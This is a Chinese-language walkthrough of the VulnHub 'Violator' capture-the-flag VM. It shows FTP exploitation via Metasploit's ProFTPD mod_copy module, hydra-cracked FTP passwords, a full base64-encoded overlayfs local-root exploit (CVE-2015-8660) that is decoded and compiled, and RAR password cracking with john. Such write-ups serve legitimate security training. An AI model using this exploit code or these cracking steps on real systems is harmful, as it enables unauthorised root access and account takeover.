NO.6 violator 靶场

admin 2024年11月12日20:19:48评论4 views字数 6179阅读20分35秒阅读模式

NO.6 violator 靶场

01.靶场介绍

Description

Welcome to another boot2root / CTF this one is called Violator. The VM is set to grab a DHCP lease on boot. As with my previous VMs, there is a theme, and you will need to snag the flag in order to complete the challenge.

A word of warning: The VM has a small HDD so you can brute force, but please set the disk to non persistent so you can always revert.

Some hints for you:

  • Vince Clarke can help you with the Fast Fashion.

  • The challenge isn't over with root. The flag is something special.

  • I have put a few trolls in, but only to sport with you.

SHA1SUM: 47F68241E95E189126E94A38CB4AD461DD58EE88 violator.ova

Many thanks to BenR and GKNSB for testing this CTF.

Special thanks and shout-outs go to BenR, Rasta_Mouse and g0tmi1k for helping me to learn a lot creating these challenges.

欢迎来到另一个 boot2root / CTF,这个叫做 Violator。VM 设置为在启动时获取 DHCP 租约。与我之前的 VM 一样,有一个主题,您需要抓住旗帜才能完成挑战。

一句警告:虚拟机有一个小硬盘,所以你可以暴力破解,但请将磁盘设置为非持久性,这样你就可以随时恢复。

给你的一些提示:

  • 文斯·克拉克 (Vince Clarke) 可以在快时尚方面为您提供帮助。

  • root 挑战还没有结束。旗帜很特别。

  • 我放了几个巨魔,但只是为了和你玩。

下载地址:https://www.vulnhub.com/entry/violator-1,153/

02.信息收集

主机发现

NO.6 violator 靶场

端口扫描

NO.6 violator 靶场

目录扫描

目录扫描也没发现什么

NO.6 violator 靶场

敏感信息

这里有三个可以关注的点,一个标题、一个网站,一个图片。

NO.6 violator 靶场

图片没有啥信息

NO.6 violator 靶场

这里有个标题倒是可以试试

NO.6 violator 靶场

NO.6 violator 靶场

这里发现漏洞还是可以用的。

NO.6 violator 靶场

NO.6 violator 靶场

https://en.wikipedia.org/wiki/Violator_(album) 根据经验这里可能需要收集一些信息做字典。

NO.6 violator 靶场NO.6 violator 靶场

03.获取权限

使用msf proftpd_modcopy_exec 模块获取权限

exploit unix/ftp/proftpd_modcopy_exec

NO.6 violator 靶场

python3 -c 'import pty;pty.spawn("/bin/bash")'

NO.6 violator 靶场

NO.6 violator 靶场

这里除了root,还有四个可以登录的账号

NO.6 violator 靶场

使用cewl 去爬取网站字典,然后去空处理后如下:

cewl -v 'en.wikipedia.org/wiki/Violator_(album)' -d 1 -w violator.txt --proxy_host 34.66.5.144 --proxy_port 8888
worldinmyeyes 
sweetestperfection
personaljesus
halo
waitingforthenight
enjoythesilence
policyoftruth
bludress
clean
cangerous
memphisto
sibeling
kaleid
happiestgirl
seaofsin

接下来就可以使用九头蛇进行爆破了。

NO.6 violator 靶场

[21][ftp] host: 192.168.43.112   login: aw   password: sweetestperfection
[21][ftp] host: 192.168.43.112 login: af password: enjoythesilence
[21][ftp] host: 192.168.43.112 login: mg password: bluedress
[21][ftp] host: 192.168.43.112 login: dg password: policyoftruth

试了一下,这个四个账号都能登录

NO.6 violator 靶场

04.权限提升

这里直接使用内核进行提权,当然也可以用dg 账号里面的sudo进行提取。

NO.6 violator 靶场

没有 wgetcurl。。。‘

NO.6 violator 靶场

使用base64加密,然后写到服务器的时候解密保存

echo LyoKanVzdCBhbm90aGVyIG92ZXJsYXlmcyBleHBsb2l0LCB3b3JrcyBvbiBrZXJuZWxzIGJlZm9y
ZSAyMDE1LTEyLTI2CgojIEV4cGxvaXQgVGl0bGU6IG92ZXJsYXlmcyBsb2NhbCByb290CiMgRGF0
ZTogMjAxNi0wMS0wNQojIEV4cGxvaXQgQXV0aG9yOiByZWJlbAojIFZlcnNpb246IFVidW50dSAx
NC4wNCBMVFMsIDE1LjEwIGFuZCBtb3JlCiMgVGVzdGVkIG9uOiBVYnVudHUgMTQuMDQgTFRTLCAx
NS4xMAojIENWRSA6IENWRS0yMDE1LTg2NjAKCmJsYWhAdWJ1bnR1On4kIGlkCnVpZD0xMDAxKGJs
YWgpIGdpZD0xMDAxKGJsYWgpIGdyb3Vwcz0xMDAxKGJsYWgpCmJsYWhAdWJ1bnR1On4kIHVuYW1l
IC1hICYmIGNhdCAvZXRjL2lzc3VlCkxpbnV4IHVidW50dSAzLjE5LjAtNDItZ2VuZXJpYyAjNDh+
MTQuMDQuMS1VYnVudHUgU01QIEZyaSBEZWMgMTggMTA6MjQ6NDkgVVRDIDIwMTUgeDg2XzY0IHg4
Nl82NCB4ODZfNjQgR05VL0xpbnV4ClVidW50dSAxNC4wNC4zIExUUyBcbiBcbApibGFoQHVidW50
dTp+JCAuL292ZXJsYXlmYWlsCnJvb3RAdWJ1bnR1On4jIGlkCnVpZD0wKHJvb3QpIGdpZD0xMDAx
KGJsYWgpIGdyb3Vwcz0wKHJvb3QpLDEwMDEoYmxhaCkKCjEyLzIwMTUKYnkgcmViZWwKCjYzNTRi
NGUyM2RiMjI1YjU2NWQ3OWYyMjZmMmU0OWVjMGZlMWUxOWIKKi8KCiNpbmNsdWRlIDxzdGRpby5o
PgojaW5jbHVkZSA8c2NoZWQuaD4KI2luY2x1ZGUgPHN0ZGxpYi5oPgojaW5jbHVkZSA8dW5pc3Rk
Lmg+CiNpbmNsdWRlIDxzY2hlZC5oPgojaW5jbHVkZSA8c3lzL3N0YXQuaD4KI2luY2x1ZGUgPHN5
cy90eXBlcy5oPgojaW5jbHVkZSA8c3lzL21vdW50Lmg+CiNpbmNsdWRlIDxzdGRpby5oPgojaW5j
bHVkZSA8c3RkbGliLmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4KI2luY2x1ZGUgPHNjaGVkLmg+CiNp
bmNsdWRlIDxzeXMvc3RhdC5oPgojaW5jbHVkZSA8c3lzL3R5cGVzLmg+CiNpbmNsdWRlIDxzeXMv
bW91bnQuaD4KI2luY2x1ZGUgPHN5cy90eXBlcy5oPgojaW5jbHVkZSA8c2lnbmFsLmg+CiNpbmNs
dWRlIDxmY250bC5oPgojaW5jbHVkZSA8c3RyaW5nLmg+CiNpbmNsdWRlIDxsaW51eC9zY2hlZC5o
PgojaW5jbHVkZSA8c3lzL3dhaXQuaD4KCnN0YXRpYyBjaGFyIGNoaWxkX3N0YWNrWzEwMjQqMTAy
NF07CgpzdGF0aWMgaW50CmNoaWxkX2V4ZWModm9pZCAqc3R1ZmYpCnsKICAgIHN5c3RlbSgicm0g
LXJmIC90bXAvaGF4aGF4Iik7CiAgICBta2RpcigiL3RtcC9oYXhoYXgiLCAwNzc3KTsKICAgIG1r
ZGlyKCIvdG1wL2hheGhheC93IiwgMDc3Nyk7CiAgICBta2RpcigiL3RtcC9oYXhoYXgvdSIsMDc3
Nyk7CiAgICBta2RpcigiL3RtcC9oYXhoYXgvbyIsMDc3Nyk7CgogICAgaWYgKG1vdW50KCJvdmVy
bGF5IiwgIi90bXAvaGF4aGF4L28iLCAib3ZlcmxheSIsIE1TX01HQ19WQUwsICJsb3dlcmRpcj0v
YmluLHVwcGVyZGlyPS90bXAvaGF4aGF4L3Usd29ya2Rpcj0vdG1wL2hheGhheC93IikgIT0gMCkg
ewoJZnByaW50ZihzdGRlcnIsIm1vdW50IGZhaWxlZC4uXG4iKTsKICAgIH0KCiAgICBjaG1vZCgi
L3RtcC9oYXhoYXgvdy93b3JrIiwwNzc3KTsKICAgIGNoZGlyKCIvdG1wL2hheGhheC9vIik7CiAg
ICBjaG1vZCgiYmFzaCIsMDQ3NTUpOwogICAgY2hkaXIoIi8iKTsKICAgIHVtb3VudCgiL3RtcC9o
YXhoYXgvbyIpOwogICAgcmV0dXJuIDA7Cn0KCmludAptYWluKGludCBhcmdjLCBjaGFyICoqYXJn
dikKewogICAgaW50IHN0YXR1czsKICAgIHBpZF90IHdyYXBwZXIsIGluaXQ7CiAgICBpbnQgY2xv
bmVfZmxhZ3MgPSBDTE9ORV9ORVdOUyB8IFNJR0NITEQ7CiAgICBzdHJ1Y3Qgc3RhdCBzOwoKICAg
IGlmKCh3cmFwcGVyID0gZm9yaygpKSA9PSAwKSB7CiAgICAgICAgaWYodW5zaGFyZShDTE9ORV9O
RVdVU0VSKSAhPSAwKQogICAgICAgICAgICBmcHJpbnRmKHN0ZGVyciwgImZhaWxlZCB0byBjcmVh
dGUgbmV3IHVzZXIgbmFtZXNwYWNlXG4iKTsKCiAgICAgICAgaWYoKGluaXQgPSBmb3JrKCkpID09
IDApIHsKICAgICAgICAgICAgcGlkX3QgcGlkID0KICAgICAgICAgICAgICAgIGNsb25lKGNoaWxk
X2V4ZWMsIGNoaWxkX3N0YWNrICsgKDEwMjQqMTAyNCksIGNsb25lX2ZsYWdzLCBOVUxMKTsKICAg
ICAgICAgICAgaWYocGlkIDwgMCkgewogICAgICAgICAgICAgICAgZnByaW50ZihzdGRlcnIsICJm
YWlsZWQgdG8gY3JlYXRlIG5ldyBtb3VudCBuYW1lc3BhY2VcbiIpOwogICAgICAgICAgICAgICAg
ZXhpdCgtMSk7CiAgICAgICAgICAgIH0KCiAgICAgICAgICAgIHdhaXRwaWQocGlkLCAmc3RhdHVz
LCAwKTsKCiAgICAgICAgfQoKICAgICAgICB3YWl0cGlkKGluaXQsICZzdGF0dXMsIDApOwogICAg
ICAgIHJldHVybiAwOwogICAgfQoKICAgIHVzbGVlcCgzMDAwMDApOwoKICAgIHdhaXQoTlVMTCk7
CgogICAgc3RhdCgiL3RtcC9oYXhoYXgvdS9iYXNoIiwmcyk7CgogICAgaWYocy5zdF9tb2RlID09
IDB4ODllZCkKICAgICAgICBleGVjbCgiL3RtcC9oYXhoYXgvdS9iYXNoIiwiYmFzaCIsIi1wIiwi
LWMiLCJybSAtcmYgL3RtcC9oYXhoYXg7cHl0aG9uIC1jIFwiaW1wb3J0IG9zO29zLnNldHJlc3Vp
ZCgwLDAsMCk7b3MuZXhlY2woJy9iaW4vYmFzaCcsJ2Jhc2gnKTtcIiIsTlVMTCk7CgogICAgZnBy
aW50ZihzdGRlcnIsImNvdWxkbid0IGNyZWF0ZSBzdWlkIDooXG4iKTsKICAgIHJldHVybiAtMTsK
fQ==" | base64 -d > ex.c
chmod +x ex.c
gcc ex.c -o ex
./ex
提权成功

NO.6 violator 靶场

root下发现存在一个rar文件,但是需要爆破密码

NO.6 violator 靶场

NO.6 violator 靶场

接下来我们使用 rar2john 和 john 进行爆破,字典就是cewl 下来的密码。

1. 通过 rar2john 工具输出 rar 文件 hash2. 通过 john 工具进行 rar 文件爆破3. 查看爆破的密码  ┌──(root㉿kali)-[~/下载]└─# rar2john crocs.rar > password.hashes                      ! file name: artwork.jpg┌──(root㉿kali)-[~/下载]└─# john --wordlist=/root/violator.txt --rules password.hashesUsing default input encoding: UTF-8Loaded 1 password hash (rar, RAR3 [SHA1 256/256 AVX2 8x AES])Will run 2 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusWorld in My Eyes (crocs.rar)     1g 0:00:00:02 DONE (2023-04-13 09:45) 0.3968g/s 165.0p/s 165.0c/s 165.0C/s worldinmyeyes..suoregnaDUse the "--show" option to display all of the cracked passwords reliablySession completed.

密码爆破如下:

NO.6 violator 靶场

解压后可以看到图片如下,图片隐写存在密码。但是这里的密码没解密出来。

NO.6 violator 靶场

NO.6 violator 靶场

End

NO.6 violator 靶场

原文始发于微信公众号(贝雷帽SEC):NO.6 violator 靶场

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月12日20:19:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   NO.6 violator 靶场https://cn-sec.com/archives/1823259.html

发表评论

匿名网友 填写信息